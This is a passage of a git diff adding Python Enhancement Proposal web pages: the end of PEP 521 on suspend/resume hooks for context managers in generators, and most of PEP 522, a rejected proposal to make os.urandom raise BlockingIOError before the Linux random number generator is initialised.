may or may not successfully catch warnings raised by g(), and may +or may not inadvertently swallow warnings triggered elsewhere in the +code. The context manager, which was intended to apply only to f +and its callees, ends up having a dynamic scope that encompasses +arbitrary and unpredictable parts of its callers. This problem +becomes particularly acute when writing asynchronous code, where +essentially all functions become coroutines.

+

Here, we propose to solve this problem by notifying context managers +whenever execution is suspended or resumed within their scope, +allowing them to restrict their effects appropriately.

+
+
+

Specification

+

Two new, optional, methods are added to the context manager protocol: +__suspend__ and __resume__. If present, these methods will be +called whenever a frame’s execution is suspended or resumed from +within the context of the with block.

+

More formally, consider the following code:

+
with EXPR as VAR:
+    PARTIAL-BLOCK-1
+    f((yield foo))
+    PARTIAL-BLOCK-2
+
+
+

Currently this is equivalent to the following code (copied from PEP 343):

+
mgr = (EXPR)
+exit = type(mgr).__exit__  # Not calling it yet
+value = type(mgr).__enter__(mgr)
+exc = True
+try:
+    try:
+        VAR = value  # Only if "as VAR" is present
+        PARTIAL-BLOCK-1
+        f((yield foo))
+        PARTIAL-BLOCK-2
+    except:
+        exc = False
+        if not exit(mgr, *sys.exc_info()):
+            raise
+finally:
+    if exc:
+        exit(mgr, None, None, None)
+
+
+

This PEP proposes to modify with block handling to instead become:

+
mgr = (EXPR)
+exit = type(mgr).__exit__  # Not calling it yet
+### --- NEW STUFF ---
+if the_block_contains_yield_points:  # known statically at compile time
+    suspend = getattr(type(mgr), "__suspend__", lambda: None)
+    resume = getattr(type(mgr), "__resume__", lambda: None)
+### --- END OF NEW STUFF ---
+value = type(mgr).__enter__(mgr)
+exc = True
+try:
+    try:
+        VAR = value  # Only if "as VAR" is present
+        PARTIAL-BLOCK-1
+        ### --- NEW STUFF ---
+        suspend(mgr)
+        tmp = yield foo
+        resume(mgr)
+        f(tmp)
+        ### --- END OF NEW STUFF ---
+        PARTIAL-BLOCK-2
+    except:
+        exc = False
+        if not exit(mgr, *sys.exc_info()):
+            raise
+finally:
+    if exc:
+        exit(mgr, None, None, None)
+
+
+

Analogous suspend/resume calls are also wrapped around the yield +points embedded inside the yield from, await, async with, +and async for constructs.

+
+

Nested blocks

+

Given this code:

+
def f():
+    with OUTER:
+        with INNER:
+            yield VALUE
+
+
+

then we perform the following operations in the following sequence:

+
INNER.__suspend__()
+OUTER.__suspend__()
+yield VALUE
+OUTER.__resume__()
+INNER.__resume__()
+
+
+

Note that this ensures that the following is a valid refactoring:

+
def f():
+    with OUTER:
+        yield from g()
+
+def g():
+    with INNER
+        yield VALUE
+
+
+

Similarly, with statements with multiple context managers suspend +from right to left, and resume from left to right.

+
+
+

Other changes

+

Appropriate __suspend__ and __resume__ methods are added to +warnings.catch_warnings and decimal.localcontext.

+
+
+
+

Rationale

+

In the abstract, we gave an example of plausible but incorrect code:

+
def f():
+    with warnings.catch_warnings():
+        for x in g():
+            yield x
+
+
+

To make this correct in current Python, we need to instead write +something like:

+
def f():
+    with warnings.catch_warnings():
+        it = iter(g())
+    while True:
+        with warnings.catch_warnings():
+            try:
+                x = next(it)
+            except StopIteration:
+                break
+        yield x
+
+
+

OTOH, if this PEP is accepted then the original code will become +correct as-is. Or if this isn’t convincing, then here’s another +example of broken code; fixing it requires even greater gyrations, and +these are left as an exercise for the reader:

+
async def test_foo_emits_warning():
+    with warnings.catch_warnings(record=True) as w:
+        await foo()
+    assert len(w) == 1
+    assert "xyzzy" in w[0].message
+
+
+

And notice that this last example isn’t artificial at all – this is +exactly how you write a test that an async/await-using coroutine +correctly raises a warning. Similar issues arise for pretty much any +use of warnings.catch_warnings, decimal.localcontext, or +numpy.errstate in async/await-using code. So there’s clearly a +real problem to solve here, and the growing prominence of async code +makes it increasingly urgent.

+
+

Alternative approaches

+

The main alternative that has been proposed is to create some kind of +“task-local storage”, analogous to “thread-local storage” +[1]. In essence, the idea would be that the +event loop would take care to allocate a new “task namespace” for each +task it schedules, and provide an API to at any given time fetch the +namespace corresponding to the currently executing task. While there +are many details to be worked out [2], the basic +idea seems doable, and it is an especially natural way to handle the +kind of global context that arises at the top-level of async +application frameworks (e.g., setting up context objects in a web +framework). But it also has a number of flaws:

+
    +
  • It only solves the problem of managing global state for coroutines +that yield back to an asynchronous event loop. But there +actually isn’t anything about this problem that’s specific to +asyncio – as shown in the examples above, simple generators run +into exactly the same issue.
  • +
  • It creates an unnecessary coupling between event loops and code that +needs to manage global state. Obviously an async web framework needs +to interact with some event loop API anyway, so it’s not a big deal +in that case. But it’s weird that warnings or decimal or +NumPy should have to call into an async library’s API to access +their internal state when they themselves involve no async code. +Worse, since there are multiple event loop APIs in common use, it +isn’t clear how to choose which to integrate with. (This could be +somewhat mitigated by CPython providing a standard API for creating +and switching “task-local domains” that asyncio, Twisted, tornado, +etc. could then work with.)
  • +
  • It’s not at all clear that this can be made acceptably fast. NumPy +has to check the floating point error settings on every single +arithmetic operation. Checking a piece of data in thread-local +storage is absurdly quick, because modern platforms have put massive +resources into optimizing this case (e.g. dedicating a CPU register +for this purpose); calling a method on an event loop to fetch a +handle to a namespace and then doing lookup in that namespace is +much slower.

    More importantly, this extra cost would be paid on every access to +the global data, even for programs which are not otherwise using an +event loop at all. This PEP’s proposal, by contrast, only affects +code that actually mixes with blocks and yield statements, +meaning that the users who experience the costs are the same users +who also reap the benefits.

    +
  • +
+

On the other hand, such tight integration between task context and the +event loop does potentially allow other features that are beyond the +scope of the current proposal. For example, an event loop could note +which task namespace was in effect when a task called call_soon, +and arrange that the callback when run would have access to the same +task namespace. Whether this is useful, or even well-defined in the +case of cross-thread calls (what does it mean to have task-local +storage accessed from two threads simultaneously?), is left as a +puzzle for event loop implementors to ponder – nothing in this +proposal rules out such enhancements as well. It does seem though +that such features would be useful primarily for state that already +has a tight integration with the event loop – while we might want a +request id to be preserved across call_soon, most people would not +expect:

+
with warnings.catch_warnings():
+    loop.call_soon(f)
+
+
+

to result in f being run with warnings disabled, which would be +the result if call_soon preserved global context in general. It’s +also unclear how this would even work given that the warnings context +manager __exit__ would be called before f.

+

So this PEP takes the position that __suspend__/__resume__ +and “task-local storage” are two complementary tools that are both +useful in different circumstances.

+
+
+
+

Backwards compatibility

+

Because __suspend__ and __resume__ are optional and default to +no-ops, all existing context managers continue to work exactly as +before.

+

Speed-wise, this proposal adds additional overhead when entering a +with block (where we must now check for the additional methods; +failed attribute lookup in CPython is rather slow, since it involves +allocating an AttributeError), and additional overhead at +suspension points. Since the position of with blocks and +suspension points is known statically, the compiler can +straightforwardly optimize away this overhead in all cases except +where one actually has a yield inside a with. Furthermore, +because we only do attribute checks for __suspend__ and +__resume__ once at the start of a with block, when these +attributes are undefined then the per-yield overhead can be optimized +down to a single C-level if (frame->needs_suspend_resume_calls) { +... }. Therefore, we expect the overall overhead to be negligible.

+
+
+

Interaction with PEP 492

+

PEP 492 added new asynchronous context managers, which are like +regular context managers, but instead of having regular methods +__enter__ and __exit__ they have coroutine methods +__aenter__ and __aexit__.

+

Following this pattern, one might expect this proposal to add +__asuspend__ and __aresume__ coroutine methods. But this +doesn’t make much sense, since the whole point is that __suspend__ +should be called before yielding our thread of execution and allowing +other code to run. The only thing we accomplish by making +__asuspend__ a coroutine is to make it possible for +__asuspend__ itself to yield. So either we need to recursively +call __asuspend__ from inside __asuspend__, or else we need to +give up and allow these yields to happen without calling the suspend +callback; either way it defeats the whole point.

+

Well, with one exception: one possible pattern for coroutine code is +to call yield in order to communicate with the coroutine runner, +but without actually suspending their execution (i.e., the coroutine +might know that the coroutine runner will resume them immediately +after processing the yielded message). An example of this is the +curio.timeout_after async context manager, which yields a special +set_timeout message to the curio kernel, and then the kernel +immediately (synchronously) resumes the coroutine which sent the +message. And from the user point of view, this timeout value acts just +like the kinds of global variables that motivated this PEP. But, there +is a crucal difference: this kind of async context manager is, by +definition, tightly integrated with the coroutine runner. So, the +coroutine runner can take over responsibility for keeping track of +which timeouts apply to which coroutines without any need for this PEP +at all (and this is indeed how curio.timeout_after works).

+

That leaves two reasonable approaches to handling async context managers:

+
    +
  1. Add plain __suspend__ and __resume__ methods.
  2. +
  3. Leave async context managers alone for now until we have more +experience with them.
  4. +
+

Either seems plausible, so out of laziness / YAGNI this PEP tentatively +proposes to stick with option (2).

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0521.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0522/index.html b/pep-0522/index.html new file mode 100644 index 00000000000..a6f7640e36a --- /dev/null +++ b/pep-0522/index.html @@ -0,0 +1,863 @@ + + + + + + + + PEP 522 – Allow BlockingIOError in security sensitive APIs | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 522 – Allow BlockingIOError in security sensitive APIs

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>, Nathaniel J. Smith <njs at pobox.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Requires:
+
506
+
Created:
+
16-Jun-2016
+
Python-Version:
+
3.6
+
Resolution:
+
Security-SIG message
+
+
+
+
Table of Contents +
+
+

Abstract

+

A number of APIs in the standard library that return random values nominally +suitable for use in security sensitive operations currently have an obscure +operating system dependent failure mode that allows them to return values that +are not, in fact, suitable for such operations.

+

This is due to some operating system kernels (most notably the Linux kernel) +permitting reads from /dev/urandom before the system random number +generator is fully initialized, whereas most other operating systems will +implicitly block on such reads until the random number generator is ready.

+

For the lower level os.urandom and random.SystemRandom APIs, this PEP +proposes changing such failures in Python 3.6 from the current silent, +hard to detect, and hard to debug, errors to easily detected and debugged errors +by raising BlockingIOError with a suitable error message, allowing +developers the opportunity to unambiguously specify their preferred approach +for handling the situation.

+

For the new high level secrets API, it proposes to block implicitly if +needed whenever random number is generated by that module, as well as to +expose a new secrets.wait_for_system_rng() function to allow code otherwise +using the low level APIs to explicitly wait for the system random number +generator to be available.

+

This change will impact any operating system that offers the getrandom() +system call, regardless of whether the default behaviour of the +/dev/urandom device is to return potentially predictable results when the +system random number generator is not ready (e.g. Linux, NetBSD) or to block +(e.g. FreeBSD, Solaris, Illumos). Operating systems that prevent execution of +userspace code prior to the initialization of the system random number +generator, or do not offer the getrandom() syscall, will be entirely +unaffected by the proposed change (e.g. Windows, Mac OS X, OpenBSD).

+

The new exception or the blocking behaviour in the secrets module would +potentially be encountered in the following situations:

+
    +
  • Python code calling these APIs during Linux system initialization
  • +
  • Python code running on improperly initialized Linux systems (e.g. embedded +hardware without adequate sources of entropy to seed the system random number +generator, or Linux VMs that aren’t configured to accept entropy from the +VM host)
  • +
+
+
+

Relationship with other PEPs

+

This PEP depends on the Accepted PEP 506, which adds the secrets module.

+

This PEP competes with Victor Stinner’s PEP 524, which proposes to make +os.urandom itself implicitly block when the system RNG is not ready.

+
+
+

PEP Rejection

+

For the reference implementation, Guido rejected this PEP in favour of the +unconditional implicit blocking proposal in PEP 524 (which brings CPython’s +behaviour on Linux into line with its behaviour on other operating systems).

+

This means any further discussion of appropriate default behaviour for +os.urandom() in system Python installations in Linux distributions should +take place on the respective distro mailing lists, rather than on the upstream +CPython mailing lists.

+
+
+

Changes independent of this PEP

+

CPython interpreter initialization and random module initialization have +already been updated to gracefully fall back to alternative seeding options if +the system random number generator is not ready.

+

This PEP does not compete with the proposal in PEP 524 to add an +os.getrandom() API to expose the getrandom syscall on platforms that +offer it. There is sufficient motive for adding that API in the os module’s +role as a thin wrapper around potentially platform dependent operating system +features that it can be added regardless of what happens to the default +behaviour of os.urandom() on these systems.

+
+
+

Proposal

+
+

Changing os.urandom() on platforms with the getrandom() system call

+

This PEP proposes that in Python 3.6+, os.urandom() be updated to call +the getrandom() syscall in non-blocking mode if available and raise +BlockingIOError: system random number generator is not ready; see secrets.token_bytes() +if the kernel reports that the call would block.

+

This behaviour will then propagate through to the existing +random.SystemRandom, which provides a relatively thin wrapper around +os.urandom() that matches the random.Random() API.

+

However, the new secrets module introduced by PEP 506 will be updated to +catch the new exception and implicitly wait for the system random number +generator if the exception is ever encountered.

+

In all cases, as soon as a call to one of these security sensitive APIs +succeeds, all future calls to these APIs in that process will succeed +without blocking (once the operating system random number generator is ready +after system boot, it remains ready).

+

On Linux and NetBSD, this will replace the previous behaviour of returning +potentially predictable results read from /dev/urandom.

+

On FreeBSD, Solaris, and Illumos, this will replace the previous behaviour of +implicitly blocking until the system random number generator is ready. However, +it is not clear if these operating systems actually allow userspace code (and +hence Python) to run before the system random number generator is ready.

+

Note that in all cases, if calling the underlying getrandom() API reports +ENOSYS rather than returning a successful response or reporting EAGAIN, +CPython will continue to fall back to reading from /dev/urandom directly.

+
+
+

Adding secrets.wait_for_system_rng()

+

A new exception shouldn’t be added without a straightforward recommendation +for how to resolve that error when encountered (however rare encountering +the new error is expected to be in practice). For security sensitive code that +actually does need to use the lower level interfaces to the system random +number generator (rather than the new secrets module), and does receive +live bug reports indicating this is a real problem for the userbase of that +particular application rather than a theoretical one, this PEP’s recommendation +will be to add the following snippet (directly or indirectly) to the +__main__ module:

+
import secrets
+secrets.wait_for_system_rng()
+
+
+

Or, if compatibility with versions prior to Python 3.6 is needed:

+
try:
+    import secrets
+except ImportError:
+    pass
+else:
+    secrets.wait_for_system_rng()
+
+
+

Within the secrets module itself, this will then be used in +token_bytes() to block implicitly if the new exception is encountered:

+
def token_bytes(nbytes=None):
+    if nbytes is None:
+        nbytes = DEFAULT_ENTROPY
+    try:
+        result = os.urandom(nbytes)
+    except BlockingIOError:
+        wait_for_system_rng()
+        result = os.urandom(nbytes)
+    return result
+
+
+

Other parts of the module will then be updated to use token_bytes() as +their basic random number generation building block, rather than calling +os.urandom() directly.

+

Application frameworks covering use cases where access to the system random +number generator is almost certain to be needed (e.g. web frameworks) may +choose to incorporate a call to secrets.wait_for_system_rng() implicitly +into the commands that start the application such that existing calls to +os.urandom() will be guaranteed to never raise the new exception when using +those frameworks.

+

For cases where the error is encountered for an application which cannot be +modified directly, then the following command can be used to wait for the +system random number generator to initialize before starting that application:

+
python3 -c "import secrets; secrets.wait_for_system_rng()"
+
+
+

For example, this snippet could be added to a shell script or a systemd +ExecStartPre hook (and may prove useful in reliably waiting for the +system random number generator to be ready, even if the subsequent command +is not itself an application running under Python 3.6)

+

Given the changes proposed to os.urandom() above, and the inclusion of +an os.getrandom() API on systems that support it, the suggested +implementation of this function would be:

+
if hasattr(os, "getrandom"):
+    # os.getrandom() always blocks waiting for the system RNG by default
+    def wait_for_system_rng():
+        """Block waiting for system random number generator to be ready"""
+        os.getrandom(1)
+        return
+else:
+   # As far as we know, other platforms will never get BlockingIOError
+   # below but the implementation makes pessimistic assumptions
+    def wait_for_system_rng():
+        """Block waiting for system random number generator to be ready"""
+        # If the system RNG is already seeded, don't wait at all
+        try:
+            os.urandom(1)
+            return
+        except BlockingIOError:
+            pass
+        # Avoid the below busy loop if possible
+        try:
+            block_on_system_rng = open("/dev/random", "rb")
+        except FileNotFoundError:
+            pass
+        else:
+            with block_on_system_rng:
+                block_on_system_rng.read(1)
+        # Busy loop until the system RNG is ready
+        while True:
+            try:
+                os.urandom(1)
+                break
+            except BlockingIOError:
+                # Only check once per millisecond
+                time.sleep(0.001)
+
+
+

On systems where it is possible to wait for the system RNG to be ready, this +function will do so without a busy loop if os.getrandom() is defined, +os.urandom() itself implicitly blocks, or the /dev/random device is +available. If the system random number generator is ready, this call is +guaranteed to never block, even if the system’s /dev/random device uses +a design that permits it to block intermittently during normal system operation.

+
+
+

Limitations on scope

+

No changes are proposed for Windows or Mac OS X systems, as neither of those +platforms provides any mechanism to run Python code before the operating +system random number generator has been initialized. Mac OS X goes so far as +to kernel panic and abort the boot process if it can’t properly initialize the +random number generator (although Apple’s restrictions on the supported +hardware platforms make that exceedingly unlikely in practice).

+

Similarly, no changes are proposed for other *nix systems that do not offer +the getrandom() syscall. On these systems, os.urandom() will continue +to block waiting for the system random number generator to be initialized.

+

While other *nix systems that offer a non-blocking API (other than +getrandom()) for requesting random numbers suitable for use in security +sensitive applications could potentially receive a similar update to the one +proposed for getrandom() in this PEP, such changes are out of scope for +this particular proposal.

+

Python’s behaviour on older versions of affected platforms that do not offer +the new getrandom() syscall will also remain unchanged.

+
+
+
+

Rationale

+
+

Ensuring the secrets module implicitly blocks when needed

+

This is done to help encourage the meme that arises for folks that want the +simplest possible answer to the right way to generate security sensitive random +numbers to be “Use the secrets module when available or your application might +crash unexpectedly”, rather than the more boilerplate heavy “Always call +secrets.wait_for_system_rng() when available or your application might crash +unexpectedly”.

+

It’s also done due to the BDFL having a higher tolerance for APIs that might +block unexpectedly than he does for APIs that might throw an unexpected +exception [11].

+
+
+

Raising BlockingIOError in os.urandom() on Linux

+

For several years now, the security community’s guidance has been to use +os.urandom() (or the random.SystemRandom() wrapper) when implementing +security sensitive operations in Python.

+

To help improve API discoverability and make it clearer that secrecy and +simulation are not the same problem (even though they both involve +random numbers), PEP 506 collected several of the one line recipes based +on the lower level os.urandom() API into a new secrets module.

+

However, this guidance has also come with a longstanding caveat: developers +writing security sensitive software at least for Linux, and potentially for +some other *BSD systems, may need to wait until the operating system’s +random number generator is ready before relying on it for security sensitive +operations. This generally only occurs if os.urandom() is read very +early in the system initialization process, or on systems with few sources of +available entropy (e.g. some kinds of virtualized or embedded systems), but +unfortunately the exact conditions that trigger this are difficult to predict, +and when it occurs then there is no direct way for userspace to tell it has +happened without querying operating system specific interfaces.

+

On *BSD systems (if the particular *BSD variant allows the problem to occur +at all) and potentially also Solaris and Illumos, encountering this situation +means os.urandom() will either block waiting for the system random number +generator to be ready (the associated symptom would be for the affected script +to pause unexpectedly on the first call to os.urandom()) or else will +behave the same way as it does on Linux.

+

On Linux, in Python versions up to and including Python 3.4, and in +Python 3.5 maintenance versions following Python 3.5.2, there’s no clear +indicator to developers that their software may not be working as expected +when run early in the Linux boot process, or on hardware without good +sources of entropy to seed the operating system’s random number generator: due +to the behaviour of the underlying /dev/urandom device, os.urandom() +on Linux returns a result either way, and it takes extensive statistical +analysis to show that a security vulnerability exists.

+

By contrast, if BlockingIOError is raised in those situations, then +developers using Python 3.6+ can easily choose their desired behaviour:

+
    +
  1. Wait for the system RNG at or before application startup (security sensitive)
  2. +
  3. Switch to using the random module (non-security sensitive)
  4. +
+
+
+

Making secrets.wait_for_system_rng() public

+

Earlier versions of this PEP proposed a number of recipes for wrapping +os.urandom() to make it suitable for use in security sensitive use cases.

+

Discussion of the proposal on the security-sig mailing list prompted the +realization [9] that the core assumption driving the API design in this PEP +was that choosing between letting the exception cause the application to fail, +blocking waiting for the system RNG to be ready and switching to using the +random module instead of os.urandom is an application and use-case +specific decision that should take into account application and use-case +specific details.

+

There is no way for the interpreter runtime or support libraries to determine +whether a particular use case is security sensitive or not, and while it’s +straightforward for application developer to decide how to handle an exception +thrown by a particular API, they can’t readily workaround an API blocking when +they expected it to be non-blocking.

+

Accordingly, the PEP was updated to add secrets.wait_for_system_rng() as +an API for applications, scripts and frameworks to use to indicate that they +wanted to ensure the system RNG was available before continuing, while library +developers could continue to call os.urandom() without worrying that it +might unexpectedly start blocking waiting for the system RNG to be available.

+
+
+
+

Backwards Compatibility Impact Assessment

+

Similar to PEP 476, this is a proposal to turn a previously silent security +failure into a noisy exception that requires the application developer to +make an explicit decision regarding the behaviour they desire.

+

As no changes are proposed for operating systems that don’t provide the +getrandom() syscall, os.urandom() retains its existing behaviour as +a nominally blocking API that is non-blocking in practice due to the difficulty +of scheduling Python code to run before the operating system random number +generator is ready. We believe it may be possible to encounter problems akin to +those described in this PEP on at least some *BSD variants, but nobody has +explicitly demonstrated that. On Mac OS X and Windows, it appears to be +straight up impossible to even try to run a Python interpreter that early in +the boot process.

+

On Linux and other platforms with similar /dev/urandom behaviour, +os.urandom() retains its status as a guaranteed non-blocking API. +However, the means of achieving that status changes in the specific case of +the operating system random number generator not being ready for use in security +sensitive operations: historically it would return potentially predictable +random data, with this PEP it would change to raise BlockingIOError.

+

Developers of affected applications would then be required to make one of the +following changes to gain forward compatibility with Python 3.6, based on the +kind of application they’re developing.

+
+

Unaffected Applications

+

The following kinds of applications would be entirely unaffected by the change, +regardless of whether or not they perform security sensitive operations:

+
    +
  • applications that don’t support Linux
  • +
  • applications that are only run on desktops or conventional servers
  • +
  • applications that are only run after the system RNG is ready (including +those where an application framework calls secrets.wait_for_system_rng() +on their behalf)
  • +
+

Applications in this category simply won’t encounter the new exception, so it +will be reasonable for developers to wait and see if they receive +Python 3.6 compatibility bugs related to the new runtime behaviour, rather than +attempting to pre-emptively determine whether or not they’re affected.

+
+
+

Affected security sensitive applications

+

Security sensitive applications would need to either change their system +configuration so the application is only started after the operating system +random number generator is ready for security sensitive operations, change the +application startup code to invoke secrets.wait_for_system_rng(), or +else switch to using the new secrets.token_bytes() API.

+

As an example for components started via a systemd unit file, the following +snippet would delay activation until the system RNG was ready:

+
+
ExecStartPre=python3 -c “import secrets; secrets.wait_for_system_rng()”
+

Alternatively, the following snippet will use secrets.token_bytes() if +available, and fall back to os.urandom() otherwise:

+
+
+
try:
import secrets.token_bytes as _get_random_bytes
+
except ImportError:
import os.urandom as _get_random_bytes
+
+
+
+
+

Affected non-security sensitive applications

+

Non-security sensitive applications should be updated to use the random +module rather than os.urandom:

+
def pseudorandom_bytes(num_bytes):
+    return random.getrandbits(num_bytes*8).to_bytes(num_bytes, "little")
+
+
+

Depending on the details of the application, the random module may offer +other APIs that can be used directly, rather than needing to emulate the +raw byte sequence produced by the os.urandom() API.

+
+
+
+

Additional Background

+
+

Why propose this now?

+

The main reason is because the Python 3.5.0 release switched to using the new +Linux getrandom() syscall when available in order to avoid consuming a +file descriptor [1], and this had the side effect of making the following +operations block waiting for the system random number generator to be ready:

+
    +
  • os.urandom (and APIs that depend on it)
  • +
  • importing the random module
  • +
  • initializing the randomized hash algorithm used by some builtin types
  • +
+

While the first of those behaviours is arguably desirable (and consistent with +the existing behaviour of os.urandom on other operating systems), the +latter two behaviours are unnecessary and undesirable, and the last one is now +known to cause a system level deadlock when attempting to run Python scripts +during the Linux init process with Python 3.5.0 or 3.5.1 [2], while the second +one can cause problems when using virtual machines without robust entropy +sources configured [3].

+

Since decoupling these behaviours in CPython will involve a number of +implementation changes more appropriate for a feature release than a maintenance +release, the relatively simple resolution applied in Python 3.5.2 was to revert +all three of them to a behaviour similar to that of previous Python versions: +if the new Linux syscall indicates it will block, then Python 3.5.2 will +implicitly fall back on reading /dev/urandom directly [4].

+

However, this bug report also resulted in a range of proposals to add new +APIs like os.getrandom() [5], os.urandom_block() [6], +os.pseudorandom() and os.cryptorandom() [7], or adding new optional +parameters to os.urandom() itself [8], and then attempting to educate +users on when they should call those APIs instead of just using a plain +os.urandom() call.

+

These proposals arguably represent overreactions, as the question of reliably +obtaining random numbers suitable for security sensitive work on Linux is a +relatively obscure problem of interest mainly to operating system developers +and embedded systems programmers, that may not justify expanding the +Python standard library’s cross-platform APIs with new Linux-specific concerns. +This is especially so with the secrets module already being added as the +“use this and don’t worry about the low level details” option for developers +writing security sensitive software that for some reason can’t rely on even +higher level domain specific APIs (like web frameworks) and also don’t need to +worry about Python versions prior to Python 3.6.

+

That said, it’s also the case that low cost ARM devices are becoming +increasingly prevalent, with a lot of them running Linux, and a lot of folks +writing Python applications that run on those devices. That creates an +opportunity to take an obscure security problem that currently requires a lot +of knowledge about Linux boot processes and provably unpredictable random +number generation to diagnose and resolve, and instead turn it into a +relatively mundane and easy-to-find-in-an-internet-search runtime exception.

+
+
+

The cross-platform behaviour of os.urandom()

+

On operating systems other than Linux and NetBSD, os.urandom() may already +block waiting for the operating system’s random number generator to be ready. +This will happen at most once in the lifetime of the process, and the call is +subsequently guaranteed to be non-blocking.

+

Linux and NetBSD are outliers in that, even when the operating system’s random +number generator doesn’t consider itself ready for use in security sensitive +operations, reading from the /dev/urandom device will return random values +based on the entropy it has available.

+

This behaviour is potentially problematic, so Linux 3.17 added a new +getrandom() syscall that (amongst other benefits) allows callers to +either block waiting for the random number generator to be ready, or +else request an error return if the random number generator is not ready. +Notably, the new API does not support the old behaviour of returning +data that is not suitable for security sensitive use cases.

+

Versions of Python prior up to and including Python 3.4 access the +Linux /dev/urandom device directly.

+

Python 3.5.0 and 3.5.1 (when build on a system that offered the new syscall) +called getrandom() in blocking mode in order to avoid the use of a file +descriptor to access /dev/urandom. While there were no specific problems +reported due to os.urandom() blocking in user code, there were problems +due to CPython implicitly invoking the blocking behaviour during interpreter +startup and when importing the random module.

+

Rather than trying to decouple SipHash initialization from the +os.urandom() implementation, Python 3.5.2 switched to calling +getrandom() in non-blocking mode, and falling back to reading from +/dev/urandom if the syscall indicates it will block.

+

As a result of the above, os.urandom() in all Python versions up to and +including Python 3.5 propagate the behaviour of the underling /dev/urandom +device to Python code.

+
+
+

Problems with the behaviour of /dev/urandom on Linux

+

The Python os module has largely co-evolved with Linux APIs, so having +os module functions closely follow the behaviour of their Linux operating +system level counterparts when running on Linux is typically considered to be +a desirable feature.

+

However, /dev/urandom represents a case where the current behaviour is +acknowledged to be problematic, but fixing it unilaterally at the kernel level +has been shown to prevent some Linux distributions from booting (at least in +part due to components like Python currently using it for +non-security-sensitive purposes early in the system initialization process).

+

As an analogy, consider the following two functions:

+
def generate_example_password():
+    """Generates passwords solely for use in code examples"""
+    return generate_unpredictable_password()
+
+def generate_actual_password():
+    """Generates actual passwords for use in real applications"""
+    return generate_unpredictable_password()
+
+
+

If you think of an operating system’s random number generator as a method for +generating unpredictable, secret passwords, then you can think of Linux’s +/dev/urandom as being implemented like:

+
# Oversimplified artist's conception of the kernel code
+# implementing /dev/urandom
+def generate_unpredictable_password():
+    if system_rng_is_ready:
+        return use_system_rng_to_generate_password()
+    else:
+        # we can't make an unpredictable password; silently return a
+        # potentially predictable one instead:
+        return "p4ssw0rd"
+
+
+

In this scenario, the author of generate_example_password is fine - even if +"p4ssw0rd" shows up a bit more often than they expect, it’s only used in +examples anyway. However, the author of generate_actual_password has a +problem - how do they prove that their calls to +generate_unpredictable_password never follow the path that returns a +predictable answer?

+

In real life it’s slightly more complicated than this, because there +might be some level of system entropy available – so the fallback might +be more like return random.choice(["p4ssword", "passw0rd", +"p4ssw0rd"]) or something even more variable and hence only statistically +predictable with better odds than the author of generate_actual_password +was expecting. This doesn’t really make things more provably secure, though; +mostly it just means that if you try to catch the problem in the obvious way – +if returned_password == "p4ssw0rd": raise UhOh – then it doesn’t work, +because returned_password might instead be p4ssword or even +pa55word, or just an arbitrary 64 bit sequence selected from fewer than +2**64 possibilities. So this rough sketch does give the right general idea of +the consequences of the “more predictable than expected” fallback behaviour, +even though it’s thoroughly unfair to the Linux kernel team’s efforts to +mitigate the practical consequences of this problem without resorting to +breaking backwards compatibility.

+

This design is generally agreed to be a bad idea. As far as we can +tell, there are no use cases whatsoever in which this is the behavior +you actually want. It has led to the use of insecure ssh keys on +real systems, and many *nix-like systems (including at least Mac OS +X, OpenBSD, and FreeBSD) have modified their /dev/urandom +implementations so that they never return predictable outputs, either +by making reads block in this case, or by simply refusing to run any +userspace programs until the system RNG has been +initialized. Unfortunately, Linux has so far been unable to follow +suit, because it’s been empirically determined that enabling the +blocking behavior causes some currently extant distributions to +fail to boot.

+

Instead, the new getrandom() syscall was introduced, making +it possible for userspace applications to access the system random number +generator safely, without introducing hard to debug deadlock problems into +the system initialization processes of existing Linux distros.

+
+
+

Consequences of getrandom() availability for Python

+

Prior to the introduction of the getrandom() syscall, it simply wasn’t +feasible to access the Linux system random number generator in a provably +safe way, so we were forced to settle for reading from /dev/urandom as the +best available option. However, with getrandom() insisting on raising an +error or blocking rather than returning predictable data, as well as having +other advantages, it is now the recommended method for accessing the kernel +RNG on Linux, with reading /dev/urandom directly relegated to “legacy” +status. This moves Linux into the same category as other operating systems +like Windows, which doesn’t provide a /dev/urandom device at all: the +best available option for implementing os.urandom() is no longer simply +reading bytes from the /dev/urandom device.

+

This means that what used to be somebody else’s problem (the Linux kernel +development team’s) is now Python’s problem – given a way to detect that the +system RNG is not initialized, we have to choose how to handle this +situation whenever we try to use the system RNG.

+

It could simply block, as was somewhat inadvertently implemented in 3.5.0, +and as is proposed in Victor Stinner’s competing PEP:

+
# artist's impression of the CPython 3.5.0-3.5.1 behavior
+def generate_unpredictable_bytes_or_block(num_bytes):
+    while not system_rng_is_ready:
+        wait
+    return unpredictable_bytes(num_bytes)
+
+
+

Or it could raise an error, as this PEP proposes (in some cases):

+
# artist's impression of the behavior proposed in this PEP
+def generate_unpredictable_bytes_or_raise(num_bytes):
+    if system_rng_is_ready:
+        return unpredictable_bytes(num_bytes)
+    else:
+        raise BlockingIOError
+
+
+

Or it could explicitly emulate the /dev/urandom fallback behavior, +as was implemented in 3.5.2rc1 and is expected to remain for the rest +of the 3.5.x cycle:

+
# artist's impression of the CPython 3.5.2rc1+ behavior
+def generate_unpredictable_bytes_or_maybe_not(num_bytes):
+    if system_rng_is_ready:
+        return unpredictable_bytes(num_bytes)
+    else:
+        return (b"p4ssw0rd" * (num_bytes // 8 + 1))[:num_bytes]
+
+
+

(And the same caveats apply to this sketch as applied to the +generate_unpredictable_password sketch of /dev/urandom above.)

+

There are five places where CPython and the standard library attempt to use the +operating system’s random number generator, and thus five places where this +decision has to be made:

+
    +
  • initializing the SipHash used to protect str.__hash__ and +friends against DoS attacks (called unconditionally at startup)
  • +
  • initializing the random module (called when random is +imported)
  • +
  • servicing user calls to the os.urandom public API
  • +
  • the higher level random.SystemRandom public API
  • +
  • the new secrets module public API added by PEP 506
  • +
+

Previously, these five places all used the same underlying code, and +thus made this decision in the same way.

+

